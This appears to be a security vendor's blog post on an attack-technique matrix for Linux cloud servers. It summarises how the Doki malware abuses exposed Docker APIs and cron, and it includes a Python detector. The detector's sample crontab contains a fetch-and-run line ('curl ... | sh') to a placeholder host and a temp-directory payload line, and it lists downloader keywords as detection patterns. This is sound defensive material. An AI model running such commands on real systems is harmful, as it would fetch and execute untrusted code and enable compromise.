Taking inspiration from the MITRE ATT&CK® framework, we previously developed a matrix categorizing adversary tactics and techniques for Linux cloud servers. Linux servers are a staple in the cloud, with some organizations running anywhere from 100 to 5,000 Linux cloud servers in their production environments. If your organization has public or private servers in the cloud, they are likely Linux-based.
Use the matrix to identify gaps in your coverage against the different threats that target Linux cloud environments. As we will explain below, many of the techniques categorized on the matrix can be detected by monitoring the runtime environment for any malicious code or suspicious commands.
An Added Layer of Defense
We have added a Detection Method column to the matrix, which delineates the recommended way to detect each adversarial technique in your systems. While there are more than a few ways to detect some of these techniques, these are the most effective detection methods set forth by our experts. Please note we are only talking about host-level detection methods.
The Majority of Attacks Require Code Execution
The TTPs matrix categorizes 96 techniques spread across 10 tactics, with a common theme. Most of these techniques require the attacker to run unauthorized code or commands somewhere in the victim’s runtime environment to conduct a successful cyber attack.
Why is code execution important for an attacker?
There are nearly 100 techniques an attacker can use as part of launching a cyber attack on your Linux cloud servers. While the attack vector can vary, protecting the runtime environment is an important last line of defense, since most attacks must eventually execute unauthorized code or commands. This holds true even after an attacker has stolen credentials or exploited an unknown vulnerability. If you can monitor the runtime environment for the execution of any malicious code or suspicious commands, you will be able to detect 75 percent of the techniques listed on the matrix, regardless of how the attacker got into the system.
Doki Infecting Misconfigured Docker Cloud Servers
Doki is Linux malware that infects Docker servers in the cloud. Prior to its discovery by Intezer, the threat went undetected in VirusTotal for over 6 months. After gaining access to the system via misconfigured containers, Doki is able to execute malicious code on the host server. Let's take a look at how Doki utilizes some of the tactics on the matrix.
- Exploits Public-facing Application: Doki takes advantage of exposed Docker API ports to gain initial access to the system.
- Command and Scripting Interpreter: Doki executes 2 different scripts, a network scanner script and a downloader script. These commands run in memory and allow the attacker to download further payloads onto the container and the host server.
- Local job scheduling: Doki modifies the host's cron to execute the downloaded payload every minute, achieving persistence.
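Two of the host-level checks the matrix points at for this chain, exposed Docker API configuration and every-minute cron persistence, as an added example written for this post (not Intezer's code or part of the matrix). The crontab text and daemon.json below are constructed samples; the path and downloader indicators are assumptions a defender would tune to their own environment.

```python
import json
import re

# Five cron schedule fields followed by the command (per-user crontab format;
# /etc/crontab carries an extra user field that this regex does not model).
CRON_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")
EVERY_MINUTE = ("*", "*", "*", "*", "*")
# Assumed indicators: a payload staged in a temp directory, or a downloader
# invoked directly from the job, matching the behaviour described above.
SUSPICIOUS_PATHS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOADERS = ("curl", "wget")

# Constructed sample crontab: two benign jobs, two every-minute jobs worth alerting on.
SAMPLE_CRONTAB = """\
# constructed sample crontab
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
* * * * * /tmp/.x/payload >/dev/null 2>&1
*/5 * * * * /usr/local/bin/backup.sh
* * * * * curl -s http://example.invalid/p.sh | sh
"""
# Constructed daemon.json exposing the API on TCP with no TLS verification.
SAMPLE_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'


def find_suspicious_cron_entries(crontab_text: str) -> list[str]:
    """Return cron lines that run every minute AND launch a temp-dir payload or a downloader."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_RE.match(line)
        if not m:
            continue
        schedule, command = tuple(m.groups()[:5]), m.group(6)
        staged = any(p in command for p in SUSPICIOUS_PATHS)
        downloads = any(re.search(rf"\b{d}\b", command) for d in DOWNLOADERS)
        if schedule == EVERY_MINUTE and (staged or downloads):
            hits.append(line)
    return hits


def docker_api_exposed(daemon_json_text: str) -> bool:
    """True if daemon.json binds the Docker API to a TCP socket without tlsverify.

    Note: the daemon can also be exposed via -H on the dockerd command line
    (for example in the systemd unit), which this config-only check does not see.
    """
    cfg = json.loads(daemon_json_text)
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    return bool(tcp_hosts) and not cfg.get("tlsverify", False)
```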
This resource is not affiliated with, sponsored by, or endorsed by MITRE ATT&CK®, nor does it represent the views and opinions of The MITRE Corporation or MITRE personnel.
We believe monitoring the runtime environment is the key to preventing most cyber attacks on your cloud infrastructure. Intezer Protect customers benefit from having full visibility over the code executed on their servers, while being alerted on any unauthorized or malicious code. Protect up to 10 servers for free via our community edition.